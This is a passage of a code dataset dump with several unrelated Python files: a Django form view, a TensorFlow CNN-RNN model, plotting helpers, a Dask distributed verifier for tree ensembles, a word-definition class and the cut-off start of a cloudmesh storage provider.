' + item.nome + ''\n texto += '\\n'\n texto += '\\n'\n texto += '\\n'\n texto += '\\n'\n texto += renderizar_formulario_conhecimento(item.filhos, request)\n texto += '\\n
Nao conhecoOuvi falarNocoes minimasConhecimento BasicoConhecimento intermediarioConhecimento avancado
'\n texto += '\\n
'\n texto += '\\n'\n else:\n texto += '\\n' + item.nome +''\n for i in range(0,6):\n existe = ''\n testearea = Area.objects.get(nome=item.nome)\n verificador = FormularioConhecimento()\n try:\n verificador = FormularioConhecimento.objects.get(area = testearea, usuario = request.user, nivel = i)\n except:\n pass\n if (verificador.nivel != None):\n existe = 'checked'\n\n import logging\n logging.debug(verificador.nivel)\n logging.debug(i)\n logging.debug(testearea)\n logging.debug(request.user)\n logging.debug(existe)\n logging.debug('######################')\n texto += ''\n texto += ''\n return texto\n\n@login_required \ndef exibir_formulario_conhecimento(request):\n\n MEDIA_URL = settings.MEDIA_URL\n\n formulario = gerar_formulario_conhecimento()\n renderizado = renderizar_formulario_conhecimento(formulario, request)\n\n #import logging\n #logging.debug('###########################################')\n #logging.debug(formulario)\n #logging.debug('-------------------------------------------')\n #logging.debug(renderizado)\n \n return render_to_response(\"informacoes/base.html\", {'form': renderizado, 'MEDIA_URL': MEDIA_URL})\n\n\n\ndef executar_formulario_conhecimento(request):\n ''' no model:\n verficiar loop infinito\n verificar se ja existe entrada do mesmo usuario\n '''\n \n MEDIA_URL = settings.MEDIA_URL\n\n if (request.user.is_authenticated() == False):\n return render_to_response(\"informacoes/base.html\", {'erro':'Falha ao verificar usuario.', 'MEDIA_URL':MEDIA_URL})\n\n formulario = request.POST\n\n for conhecimento in formulario:\n if conhecimento == u'csrfmiddlewaretoken':\n continue\n nConhecimento = formulario[conhecimento]\n nivel = 0\n if nConhecimento == u'1':\n nivel = 1\n if nConhecimento == u'2':\n nivel = 2\n if nConhecimento == u'3':\n nivel = 3\n if nConhecimento == u'4':\n nivel = 4\n if nConhecimento == u'5':\n nivel = 5\n resposta = FormularioConhecimento(\n area = Area.objects.get(nome=conhecimento),\n usuario = request.user,\n nivel = nivel\n )\n\n #import logging\n #logging.debug(\"##################\")\n #logging.debug(resposta.pk)\n #logging.debug(resposta.area)\n #logging.debug(resposta.usuario)\n #logging.debug(resposta.nivel)\n \n entrada_banco = None\n\n try:\n entrada_banco = FormularioConhecimento.objects.get(area = Area.objects.get(nome=conhecimento), usuario = request.user)\n except:\n pass\n \n if ( entrada_banco != None):\n entrada_banco.nivel = resposta.nivel\n entrada_banco.save()\n else:\n resposta.save()\n message = 'Formulario enviado com sucesso'\n return render_to_response(\"informacoes/resultado.html\", locals())\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"385950126","text":"# -*- coding: UTF-8 -*- \n'''\nAuthorized by Vlon Jang\nCreated on 2017-03-02 \nBlog: www.wangqingbaidu.cn\nEmail: wangqingbaidu@gmail.com\nFrom kwai, www.kuaishou.com\n©2015-2017 All Rights Reserved.\n'''\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\n\nimport tensorflow as tf\nfrom tensorflow.python.ops import math_ops\n\nlogger = logging.getLogger('CNN-RNN Model')\nlogging.basicConfig(\n format=\"[%(asctime)s - %(filename)s:line %(lineno)4s] %(message)s\",\n datefmt='%d %b %H:%M:%S')\nlogger.setLevel(logging.INFO)\n\nclass CNNRNNModel(object):\n \"\"\"\n The Visual features fixed with RNN model. \n Use CNN features from pre-trained model like vgg or googlenet.\n RNN unit type is optional.\n \n Parameters\n ---------------\n @is_training: Generate this model for training or for inferencing.\n @config: Configurations of this model which contains hyperparameters.\n @num_steps: Max labels of each sample.\n @flag_with_saver: Use saver of not, default False.\n @flag_reset_state: Whether to reset RNN state or not, default False.\n \n Public Methods\n ---------------\n @assign_lr: Assign learning rate.\n parmas: sess, value\n return None\n \"\"\"\n\n def __init__(self, is_training, config, scope, reuse,\n num_steps = None,\n flag_with_saver=False,\n flag_reset_state=False):\n \n self.batch_size = batch_size = config.batch_size\n if not num_steps:\n self.num_steps = num_steps = config.num_steps\n else:\n self.num_steps = num_steps\n \n rnn_size = config.rnn_size\n emb_size = config.emb_size\n vocab_size = config.vocab_size\n vf_size = config.vf_size\n# const_scale = tf.constant([1, 1, emb_size])\n \n # Add CNN model\n # inception_v3(scope='CNN')\n \n with tf.variable_scope(tf.get_variable_scope(), reuse=reuse):\n # Inputs to the model\n self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])\n self._input_data_scale = tf.placeholder(tf.float32, [batch_size, num_steps])\n self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])\n self._visual_features = tf.placeholder(tf.float32, [batch_size, vf_size])\n self._valid_flags = tf.placeholder(tf.float32, [batch_size, num_steps])\n self._seq_lens = tf.placeholder(tf.int32, [batch_size])\n \n # Create rnn cell\n if config.rnn_type == 'GRU':\n rnn_cell_basic = tf.contrib.rnn.GRUCell(rnn_size)\n elif config.rnn_type == 'LSTM':\n rnn_cell_basic = tf.contrib.rnn.LSTMCell(rnn_size, use_peepholes=True)\n else:\n raise NameError(\"Unknown rnn type %s!\" % config.rnn_type)\n \n # Dropout if configured\n if is_training and config.keep_prob_rnn < 1:\n rnn_cell_basic = tf.contrib.rnn.DropoutWrapper(\n rnn_cell_basic, output_keep_prob=config.keep_prob_rnn)\n \n cell = tf.contrib.rnn.MultiRNNCell([rnn_cell_basic] * config.num_rnn_layers)\n state_size = cell.state_size\n \n # Create word embedding\n # WARNIJNG: Take care of label \n self._embedding = embedding = tf.get_variable(\"embedding\", [vocab_size, emb_size])\n # embedding all input_data to a tensor list\n inputs = tf.nn.embedding_lookup(embedding, self._input_data)\n \n # Expand tensor dim\n# scale = tf.tile(tf.expand_dims(self._input_data_scale, axis = -1), const_scale)\n# inputs = tf.multiply(embedding_out, scale)\n\n if is_training and config.keep_prob_emb < 1:\n inputs = tf.nn.dropout(inputs, config.keep_prob_emb)\n \n # Different ways to use text and visual information\n if config.multimodal_type == 'mrnn':\n mm_size = config.mm_size\n # Run RNNs\n if flag_reset_state:\n initial_state = (tf.placeholder(tf.float32, [batch_size, state_size[0]]), )\n self._initial_state = initial_state\n else:\n self._initial_state = initial_state = cell.zero_state(batch_size, tf.float32)\n \n inputs = [tf.squeeze(input_, [1])\n for input_ in tf.split(inputs, num_steps, 1)]\n outputs_rnn, state = tf.contrib.rnn.static_rnn(cell, inputs, \n initial_state = initial_state,\n sequence_length = self._seq_lens)\n self._final_state = state\n output_rnn = tf.reshape(tf.concat(outputs_rnn, 1), [-1, rnn_size])\n # Map RNN output to multimodal space\n w_r2m = tf.get_variable(\"w_r2m\", [rnn_size, mm_size])\n b_r2m = tf.get_variable(\"b_r2m\", [mm_size])\n multimodal_l = tf.nn.relu(tf.matmul(output_rnn, w_r2m) + b_r2m)\n \n # Map Visual feature to multimodal space\n w_vf2m = tf.get_variable(\"w_vf2m\", [vf_size, mm_size])\n b_vf2m = tf.get_variable(\"b_vf2m\", [mm_size])\n mm_vf_single = tf.nn.relu(tf.matmul(self._visual_features, w_vf2m) + b_vf2m)\n mm_vf = tf.reshape(tf.tile(mm_vf_single, [1, num_steps]), [-1, mm_size])\n multimodal_l = multimodal_l + mm_vf\n if is_training and config.keep_prob_mm < 1:\n multimodal_l = tf.nn.dropout(multimodal_l, config.keep_prob_mm)\n \n # Map multimodal space to word space\n w_m2w = tf.get_variable(\"w_m2w\", [mm_size, emb_size])\n b_m2w = tf.get_variable(\"b_m2w\", [emb_size])\n output = tf.nn.relu(tf.matmul(multimodal_l, w_m2w) + b_m2w)\n elif config.multimodal_type == 'init':\n # Mapping visual feature to the RNN state\n w_vf2state = tf.get_variable(\"w_vf2state\", [vf_size, state_size])\n b_vf2state = tf.get_variable(\"b_vf2state\", [state_size])\n if flag_reset_state:\n self._initial_state = initial_state = tf.placeholder(tf.float32, \n [batch_size, state_size])\n else:\n self._initial_state = initial_state = tf.nn.relu(\n tf.matmul(self._visual_features, w_vf2state) + b_vf2state)\n \n # Run RNNs\n inputs = [tf.squeeze(input_, [1])\n for input_ in tf.split(1, num_steps, inputs)]\n outputs_rnn, state = tf.contrib.rnn.static_rnn(cell, inputs, \n initial_state=initial_state,\n sequence_length=self._seq_lens)\n self._final_state = state\n output_rnn = tf.reshape(tf.concat(1, outputs_rnn), [-1, rnn_size])\n \n # Map multimodal space to word space\n w_m2w = tf.get_variable(\"w_m2w\", [rnn_size, emb_size])\n b_m2w = tf.get_variable(\"b_m2w\", [emb_size])\n output = tf.nn.relu(tf.matmul(output_rnn, w_m2w) + b_m2w)\n else:\n raise NameError(\"Unknown multimodal type %s!\" % config.multimodal_type)\n \n # Build sampled softmax loss\n # share the weights between embedding and softmax acc. to [2]\n w_loss = tf.transpose(embedding)\n b_loss = tf.get_variable(\"b_loss\", [vocab_size])\n self._logit = logit = tf.matmul(output, w_loss) + b_loss\n \n target = tf.reshape(math_ops.to_int64(self._targets), [-1])\n valid_flag = tf.reshape(self._valid_flags, [-1])\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits = logit, labels=target)\n self._cost = cost = tf.reduce_sum(loss * valid_flag) / (tf.reduce_sum(valid_flag) + 1e-12)\n \n # Create saver if necessary\n if flag_with_saver:\n self.saver = tf.train.Saver(max_to_keep=None)\n else:\n self.saver = None\n \n # Create learning rate and gradients optimizer\n tvars = tf.trainable_variables()\n self._grads, _ = grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars),\n config.max_grad_norm)\n \n # Return the model if it is just for inference\n if not is_training:\n return\n \n self._lr = tf.Variable(0.0, trainable=False)\n if hasattr(config, 'optimizer'):\n if config.optimizer == 'ori':\n optimizer = tf.train.GradientDescentOptimizer(self.lr)\n elif config.optimizer == 'ada': # No GPU\n optimizer = tf.train.AdagradOptimizer(self.lr)\n elif config.optimizer == 'adam':\n optimizer = tf.train.AdamOptimizer(self.lr)\n elif config.optimizer == 'rms':\n optimizer = tf.train.RMSPropOptimizer(self.lr)\n else:\n raise NameError(\"Unknown optimizer type %s!\" % config.optimizer)\n else:\n optimizer = tf.train.GradientDescentOptimizer(self.lr)\n \n self._train_op = optimizer.apply_gradients(zip(grads, tvars))\n\n def assign_lr(self, session, lr_value):\n session.run(tf.assign(self.lr, lr_value))\n\n @property\n def input_data(self):\n return self._input_data\n \n @property\n def input_data_scale(self):\n return self._input_data_scale\n \n @property\n def targets(self):\n return self._targets\n \n @property\n def valid_flags(self):\n return self._valid_flags\n \n @property\n def visual_features(self):\n return self._visual_features\n \n @property\n def seq_lens(self):\n return self._seq_lens\n \n @property\n def cost(self):\n return self._cost\n \n @property\n def final_state(self):\n return self._final_state\n \n @property\n def initial_state(self):\n return self._initial_state\n \n @property\n def lr(self):\n return self._lr\n \n @property\n def train_op(self):\n return self._train_op\n \n @property\n def embedding(self):\n return self._embedding\n \n @property\n def logit(self):\n return self._logit\n\n @property\n def grads(self):\n return self._grads","sub_path":"model/CNN_RNN.py","file_name":"CNN_RNN.py","file_ext":"py","file_size_in_byte":10959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31122908","text":"\"\"\"\nPlots for Report:\nNumerical Experiments for Verifying Demand Driven Deployment Algorithms\nNon-Optimizing Algorithm\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef demand_curve_type(x_vals, type, input1, input2, input3):\n \"\"\" Y value calculation based on demand curve type and input values\n\n Parameters\n ----------\n x_vals: list of timestep values\n type: string of type of demand curve (i.e. linear, exponential, step-wise)\n input 1: exponential -- initial demand, linear -- gradient,\n stepwise -- y-value of first segment\n input 2: exponential -- growth rate, linear -- y intercept,\n stepwise -- y-value of second segment\n input 3: stepwise -- timestep it changes from first to second segment\n\n Returns\n -------\n returns a plot of demand and acceptable supply range amount for a\n specified commodity\n\n \"\"\"\n\n if type == 'exponential':\n initial_demand = input1\n growth_rate = input2\n y_vals = [(initial_demand * (1 + growth_rate)**(x / 12))\n for x in x_vals]\n\n elif type == \"linear\":\n gradient = input1\n intercept = input2\n y_vals = [(gradient * x + intercept) for x in x_vals]\n\n elif type == \"stepwise\":\n first_y = input1\n second_y = input2\n timestep_change = input3\n x_vals_1 = x_vals[:timestep_change + 1]\n x_vals_1 = list(x_vals_1)\n x_vals_2 = x_vals[timestep_change:]\n x_vals_2 = list(x_vals_2)\n x_vals = x_vals_1 + x_vals_2\n y_vals_1 = [first_y] * (timestep_change + 1)\n timesteps_2 = (x_vals[-1] - timestep_change + 1)\n timesteps_2 = int(timesteps_2)\n y_vals_2 = [second_y] * timesteps_2\n y_vals = y_vals_1 + y_vals_2\n\n return y_vals, x_vals\n\n\ndef plot_demand_supply(duration, demand_curve, input1,\n input2, input3, commodity, test_name, demand_driving):\n \"\"\" Plots demand and acceptable supply range amount for a commodity\n\n Parameters\n ----------\n duration: int of number of timesteps in scenario\n demand_curve: string of type of demand curve (i.e. linear, exponential,\n step-wise)\n input 1: int, depending on which demand_curve, see func demand_curve_type\n input 2: int, depending on which demand_curve, see func demand_curve_type\n input 3: int, depending on which demand_curve, see func demand_curve_type\n commodity: string of tracked commodity\n test_name: string of test name\n demand_driving: True/False boolean, True if the commodity is the\n demand-driving commodity\n\n Returns\n -------\n returns a plot of demand and acceptable supply range amount for a specified\n commodity\n\n \"\"\"\n x_vals = np.linspace(0, duration, duration + 1)\n y_vals, x_vals = demand_curve_type(\n x_vals, demand_curve, input1, input2, input3)\n error_vals = [y * 0.1 for y in y_vals]\n positive_y = [x + y for x, y in zip(y_vals, error_vals)]\n negative_y = [x - y for x, y in zip(y_vals, error_vals)]\n\n fig, ax = plt.subplots(figsize=(15, 7))\n ax.plot(x_vals, y_vals, 'k-', label='Demand')\n ax.fill_between(x_vals, positive_y, negative_y,\n label='Acceptable Supply Range')\n ax.grid()\n box = ax.get_position()\n ax.set_position([box.x0, box.y0 + box.height, box.width, box.height * 1])\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(\n handles,\n labels,\n fontsize=13,\n loc='upper center',\n bbox_to_anchor=(\n 0.85,\n 1.2),\n fancybox=True)\n ax.set_xlim(0, duration)\n ax.set_ylim(0, y_vals[-1] * 1.2)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n ax.set_xlabel('Timestep (month)', fontsize=14)\n ax.set_ylabel('%s Amount (kg)' % commodity, fontsize=14)\n if demand_driving:\n ax.set_title(\n 'Test %s : %s (Demand-driving Commodity) demand and acceptable range for its supply' %\n (test_name, commodity), fontsize=16)\n else:\n ax.set_title(\n 'Test %s : %s demand and acceptable range for its supply' %\n (test_name, commodity), fontsize=16)\n plt.savefig(\n '%s_%s_demand_supply' %\n (commodity, test_name), bbox_inches=\"tight\")\n\n return fig\n","sub_path":"docs/no/figures/plot_figures.py","file_name":"plot_figures.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336864413","text":"# Copyright 2019 DTAI Research Group - KU Leuven.\n# License: Apache License 2.0\n# Author: Laurens Devos\n\nimport timeit, math, time\n\nfrom dask.distributed import wait\n\nfrom . import DomTree, DomTreeLeaf\nfrom .verifier import Verifier, VerifierTimeout, VerifierNotExpr\nfrom .verifier import in_domain_constraint\n\n\nclass VerifierFactory:\n \"\"\" Must be pickleable \"\"\"\n\n def __call__(self, domtree_leaf, path_checking):\n \"\"\"\n Override this method for your verifier factory.\n\n You can return a less constrained verifier for the path_checking part.\n \"\"\"\n raise RuntimeError(\"Override this method in your own verifier \"\n + \"factory defining your problem's constraints.\")\n\n def inv_logit(self, prob):\n \"\"\" Convert probability to raw output values for binary classification. \"\"\"\n return -math.log(1.0 / x - 1)\n\n\n\nclass _VerifierFactoryWrap(VerifierFactory):\n def __init__(self, vfactory, add_domain_constraints_opt):\n self._vfactory = vfactory\n self.add_domain_constraints_opt = add_domain_constraints_opt\n\n def __call__(self, lk, path_checking):\n v = self._vfactory(lk, path_checking)\n if self.add_domain_constraints_opt:\n for instance_index in range(lk.num_instances()):\n v.add_constraint(in_domain_constraint(v,\n lk.get_domains(instance_index),\n instance=instance_index))\n return v\n\n\n\n\n\nclass DistributedVerifier:\n\n def __init__(self,\n client,\n domtree,\n verifier_factory,\n check_paths = True,\n num_initial_tasks = 1,\n stop_when_num_sats = 1,\n add_domain_constraints = True,\n global_timeout = 0,\n timeout_start = 30,\n timeout_max = 600,\n timeout_grow_rate = 1.5):\n\n assert isinstance(verifier_factory, VerifierFactory), \"invalid verifier factory\"\n\n self._timeout_start = float(timeout_start)\n self._timeout_max = float(max(timeout_start, timeout_max))\n self._timeout_rate = float(timeout_grow_rate)\n self._nworkers = sum(client.nthreads().values())\n\n self._client = client # dask client\n self._domtree = domtree\n\n self._verifier_factory = _VerifierFactoryWrap(verifier_factory,\n add_domain_constraints)\n\n self._check_paths_opt = check_paths\n self._num_initial_tasks_opt = num_initial_tasks\n self._stop_when_num_sats_opt = stop_when_num_sats\n self._global_timeout_opt = global_timeout\n\n self._stop_flag = False\n self._print_queue = []\n\n def check(self):\n self.done_count = 0\n self.start_time = timeit.default_timer()\n self.sat_count = 0\n\n self._fs = []\n self.results = {}\n\n # 1: loop over trees, check reachability of each path from root in\n # addtrees of all instances\n l0 = self._domtree.get_leaf(self._domtree.tree().root())\n if self._check_paths_opt:\n t0 = timeit.default_timer()\n l0 = self._check_paths(l0)\n t1 = timeit.default_timer()\n self.results[\"check_paths_time\"] = t1 - t0\n\n # domtree_node_id => result info per instance + additional info\n self.results[\"num_leafs\"] = [l0.addtree(i).num_leafs()\n for i in range(l0.num_instances())]\n self.results[0] = self._init_results(l0)\n\n self._print(\"num_leafs {}\".format(self.results[\"num_leafs\"]))\n self._print_flush()\n\n # 2: splits until we have a piece of work for each worker\n if self._num_initial_tasks_opt > 1:\n t0 = timeit.default_timer()\n lks = self._generate_splits(l0, self._num_initial_tasks_opt)\n t1 = timeit.default_timer()\n self.results[\"generate_splits_time\"] = t1 - t0\n else:\n lks = [l0]\n\n # 3: submit verifier 'check' tasks for each item in `ls`\n for lk in lks:\n f = self._make_verify_future(lk, self._timeout_start)\n self._fs.append(f)\n\n # 4: wait for future to complete, act on result\n # - if sat/unsat -> done (finish if sat if opt set)\n # - if new split -> schedule two new tasks\n while len(self._fs) > 0: # while task are running...\n if self._stop_flag:\n self._print(\"Stop flag: cancelling remaining tasks\")\n for f in self._fs:\n f.cancel()\n self._stop_flag = False\n break\n if self._global_timeout_opt > 0:\n t = timeit.default_timer() - self.start_time\n if t > self._global_timeout_opt:\n self._print(\"Global timeout: cancelling remaining tasks\")\n for f in self._fs:\n f.cancel()\n break\n\n wait(self._fs, return_when=\"FIRST_COMPLETED\")\n\n next_fs = []\n for f in self._fs:\n if f.done(): next_fs += self._handle_done_future(f)\n else: next_fs.append(f)\n self._fs = next_fs\n self._print_flush()\n\n self.results[\"check_time\"] = timeit.default_timer() - self.start_time\n self._print_flush()\n\n def _check_paths(self, l0):\n num_unreachable_before = [l0.num_unreachable(i) for i in range(l0.num_instances())]\n\n self._print(\"checking paths\")\n self._print_flush()\n\n # update reachabilities in domtree root leaf 0 in parallel\n fs = []\n for instance_index in range(l0.num_instances()):\n for tree_index in range(len(l0.addtree(instance_index))):\n f = self._client.submit(DistributedVerifier._check_tree_paths,\n l0, instance_index, tree_index, self._verifier_factory)\n fs.append(f)\n\n wait(fs)\n\n l0 = DomTreeLeaf.merge([f.result() for f in fs])\n num_unreachable_after = [l0.num_unreachable(i) for i in range(l0.num_instances())]\n\n self._print(\"check_paths({}): {} -> {}\".format(l0.domtree_leaf_id(),\n num_unreachable_before, num_unreachable_after))\n self._print_flush()\n\n return l0\n\n def _generate_splits(self, l0, ntasks):\n # split domtrees until we have ntask `Subspace`s; this runs locally\n l0.find_best_split()\n lks = [l0]\n\n while len(lks) < ntasks:\n max_score = 0\n max_lk = None\n\n for lk in lks:\n if lk.score > max_score:\n max_score = lk.score\n max_lk = lk\n\n if max_lk is None:\n raise RuntimeError(\"no more splits!\")\n\n lks.remove(max_lk)\n lks += self._split_domtree(max_lk, True)\n\n self._print_flush()\n return lks\n\n def _split_domtree(self, lk, find_best_split):\n nid = lk.domtree_leaf_id()\n split = lk.get_best_split()\n score, balance = lk.score, lk.balance\n\n self._domtree.apply_leaf(lk) # lk's fields are invalid after .split(lk)\n\n l, r = self._domtree.tree().left(nid), self._domtree.tree().right(nid)\n lk_l = self._domtree.get_leaf(l)\n lk_r = self._domtree.get_leaf(r)\n\n if find_best_split:\n lk_l.find_best_split()\n lk_r.find_best_split()\n\n self.results[nid][\"split\"] = split\n self.results[nid][\"score\"] = score\n self.results[nid][\"balance\"] = balance\n self.results[nid][\"children\"] = [l, r]\n\n self.results[l] = self._init_results(lk_l)\n self.results[r] = self._init_results(lk_r)\n self.results[l][\"parent\"] = nid\n self.results[r][\"parent\"] = nid\n\n self._print(\"SPLIT l{}: {} into {}, {}, score {} \".format(\n nid, split, l, r, score))\n\n return [lk_l, lk_r]\n\n def _handle_done_future(self, f):\n t = f.result()\n status, check_time, num_leafs = t[0], t[1], t[2]\n\n self._print(\"{} for l{} in {:.2f}s (timeout={:.1f}s, #leafs={})\".format(status,\n f.domtree_leaf_id, check_time, f.timeout, num_leafs))\n\n self.results[f.domtree_leaf_id][\"status\"] = status\n self.results[f.domtree_leaf_id][\"check_time\"] = check_time\n self.results[f.domtree_leaf_id][\"num_leafs\"] = num_leafs\n\n # We're finished with this branch!\n if status != Verifier.Result.UNKNOWN:\n self.done_count += 1\n model = t[3]\n self.results[f.domtree_leaf_id][\"model\"] = model\n if status.is_sat(): self.sat_count += 1\n if self.sat_count >= self._stop_when_num_sats_opt:\n self._stop_flag = True\n return []\n\n else: # We timed out, split and try again\n lk = t[3]\n self.results[f.domtree_leaf_id][\"num_unreachable_after\"] = self._num_unreachable(lk)\n next_timeout = min(self._timeout_max, self._timeout_rate * f.timeout)\n\n new_lks = self._split_domtree(lk, False)\n new_fs = [self._make_verify_future(lk, next_timeout) for lk in new_lks]\n\n return new_fs\n\n\n\n\n def _make_verify_future(self, lk, timeout):\n nid = lk.domtree_leaf_id()\n tree = self._domtree.tree()\n parent_split = None\n\n if not tree.is_root(nid) and self._check_paths_opt:\n pid = tree.parent(nid)\n parent_split = tree.get_split(pid)\n\n f = self._client.submit(DistributedVerifier._verify_fun,\n lk, timeout, self._verifier_factory, parent_split)\n\n f.timeout = timeout\n f.domtree_leaf_id = nid\n return f\n\n def _init_results(self, lk):\n return {\n \"num_unreachable_before\": self._num_unreachable(lk),\n \"bounds\": self._tree_bounds(lk),\n \"domains\": [lk.get_domains(i) for i in range(lk.num_instances())]\n }\n\n def _num_unreachable(self, lk):\n return sum(map(lambda i: lk.num_unreachable(i), range(lk.num_instances())))\n\n def _tree_bounds(self, lk):\n bounds = []\n for i in range(lk.num_instances()):\n lo, hi = 0.0, 0.0\n for tree_index in range(len(lk.addtree(i))):\n bnds = lk.get_tree_bounds(i, tree_index)\n lo += bnds[0]\n hi += bnds[1]\n bounds.append((lo, hi))\n return bounds\n\n def _print(self, msg):\n self._print_queue.append(msg)\n\n def _print_flush(self):\n for msg in self._print_queue:\n self._print_msg(msg)\n self._print_queue = []\n\n def _print_msg(self, msg):\n t = int(timeit.default_timer() - self.start_time)\n m, s = t // 60, t % 60\n h, m = m // 60, m % 60\n done = self.done_count\n rem = len(self._fs) if hasattr(self, \"_fs\") else -1\n print(f\"[{h}h{m:02d}m{s:02d}s {done:>4} {rem:<4}]\", msg)\n\n\n\n\n\n # - WORKERS ------------------------------------------------------------- #\n\n @staticmethod\n def _check_tree_paths(lk, instance_index, tree_index,\n v_or_vfactory, only_feat_id = -1):\n addtree = lk.addtree(instance_index)\n tree = addtree[tree_index]\n stack = [(tree.root(), True)]\n\n v = v_or_vfactory\n if not isinstance(v, Verifier):\n v = v_or_vfactory(lk, True)\n\n v.instance(instance_index).mark_unreachable_paths(tree_index, only_feat_id)\n\n return lk\n\n @staticmethod\n def _recheck_tree_paths(lk, v, feat_id):\n for i in range(lk.num_instances()):\n num_reach_before = lk.num_unreachable(i)\n for tree_index in range(len(lk.addtree(i))):\n lk = DistributedVerifier._check_tree_paths(lk, i, tree_index, v, feat_id)\n print(\"_recheck_tree_paths({}): num_unreachable({}): {} -> {}\".format(\n lk.domtree_leaf_id(), i, num_reach_before, lk.num_unreachable(i)))\n return lk\n\n @staticmethod\n def _verify_fun(lk, timeout, vfactory, parent_split = None):\n v = vfactory(lk, False)\n\n # Re-checking reachabilities after split, only for splits involving feat_id\n if parent_split is not None and lk.num_instances() > 1:\n feat_id = parent_split[1].feat_id\n lk = DistributedVerifier._recheck_tree_paths(lk, v, feat_id)\n\n v.set_timeout(timeout)\n v.add_all_trees()\n num_leafs = [v.instance(i).leaf_count for i in range(lk.num_instances())]\n try:\n status = v.check()\n model = {}\n if status.is_sat():\n model = v.model()\n model[\"family\"] = v.model_family(model)\n\n return status, v.check_time, num_leafs, model\n\n except VerifierTimeout as e:\n lk.find_best_split()\n\n print(f\"timeout after {e.unk_after} (timeout = {timeout}) best split = {lk.get_best_split()}\")\n\n return Verifier.Result.UNKNOWN, v.check_time, num_leafs, lk\n","sub_path":"src/python/treeck/distributed.py","file_name":"distributed.py","file_ext":"py","file_size_in_byte":12905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"65562377","text":"\n\n#calss header\nclass _STORM():\n\tdef __init__(self,): \n\t\tself.name = \"STORM\"\n\t\tself.definitions = [u'an extreme weather condition with very strong wind, heavy rain, and often thunder and lightning: ', u'a very angry reaction from a lot of people: ', u'to be suddenly extremely successful in a place or with a group of people: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_storm.py","file_name":"_storm.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"56305667","text":"import os\nimport stat\nfrom pprint import pprint\n\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom cloudmesh.storage.StorageNewABC import StorageNewABC\nimport oyaml as yaml\nfrom cloudmesh.common.debug import VERBOSE\nfrom cloudmesh.common.StopWatch import StopWatch\nfrom cloudmesh.common.console import Console\nfrom cloudmesh.common.util import banner\nfrom cloudmesh.common.Printer import Printer\nfrom cloudmesh.configuration.Config import Config\nfrom google.cloud import storage\n\nfrom pathlib import Path\nfrom glob import glob\nimport os\nimport shutil\n\n\nclass Provider(StorageNewABC):\n \"\"\"\n Provider class for local storage.\n This class allows transfer of objects from local storage location to a\n Azure blob storage container or gcp bucket.\n\n Default parameters are read from ~/.cloudmesh/cloudmesh.yaml :\n\n storage:\n local:\n cm:\n azureblob: true\n blobactive: true\n heading: local_to_CSP\n host: localhost\n kind: local\n label: local_storage\n version: 0.1\n service: storage\n default:\n directory: ~\\cmStorage\n credentials:\n userid: None\n password: None\n \"\"\"\n\n def __init__(self, service=None, config=\"~/.cloudmesh/cloudmesh.yaml\",\n **kwargs):\n super().__init__(service=service, config=config)\n\n if kwargs.get(\"debug\"):\n print(\"Inside init of local provider\")\n print(self.kind)\n print(kwargs.get('sourceObj'))\n print(kwargs.get('target'))\n print(kwargs.get('targetObj'))\n print(self.credentials)\n\n # Processing --source/service and --target arguments separately.\n # This is a provider class for local storage hence --source/service will \\\n # always be \"local\"\n\n self.sourceCSP = self.service\n\n try:\n self.config = Config(config_path=config)\n self.yaml_content_source = self.config[\"cloudmesh.storage.\"\n f\"{self.sourceCSP}\"]\n self.source_kind = self.yaml_content_source[\"cm\"][\"kind\"]\n self.source_credentials = self.yaml_content_source[\"credentials\"]\n\n print(\"Accessing local storage location.\")\n if kwargs.get('sourceObj'):\n self.local_location = Path(self.yaml_content_source['default'][\n 'directory'],\n kwargs.get('sourceObj'))\n else:\n self.local_location = self.yaml_content_source['default'][\n 'directory']\n\n if kwargs.get(\"debug\"):\n print(f\"\\nLocal location to access {self.local_location}\")\n\n if kwargs.get('target'):\n self.targetCSP = kwargs.get('target')\n self.yaml_content_target = self.config[\"cloudmesh.storage.\"\n f\"{self.targetCSP}\"]\n self.target_kind = self.yaml_content_target[\"cm\"][\"kind\"]\n self.target_credentials = self.yaml_content_target[\n \"credentials\"]\n self.target_container = self.target_credentials[\"container\"]\n\n except Exception as e:\n Console.error(f\"Couldn't access cloudmesh.yaml. Error - {e}\")\n return ()\n\n if kwargs.get(\"debug\"):\n VERBOSE(self.yaml_content_source)\n if kwargs.get('target'):\n VERBOSE(self.yaml_content_target)\n\n banner(f\"Source CSP: {self.source_kind}\")\n if kwargs.get('target'):\n banner(f\"Target CSP: {self.target_kind}\")\n\n # Creating connection with the target CSP. This done only if the\n # --target argument is provided. Only \"copy\" command is expected to\n # have --target argument.\n\n if kwargs.get('target'):\n if self.target_kind == \"azureblob\":\n print(\"Create Azure connection.\")\n\n if 'TBD' == self.target_credentials[\"access_key_id\"] \\\n or 'TBD' == self.target_credentials[\"secret_access_key\"] \\\n or 'TBD' == self.target_credentials[\"region\"]:\n Console.error(\"Critical details missing from .yaml file. \"\n \"TBD not allowed. Please check.\")\n\n try:\n self.s3_client = boto3.client(\n 's3',\n aws_access_key_id=self.target_credentials[\n \"access_key_id\"],\n aws_secret_access_key=self.target_credentials[\n \"secret_access_key\"],\n region_name=self.target_credentials[\"region\"]\n )\n Console.ok(\n f\"Successful connection to 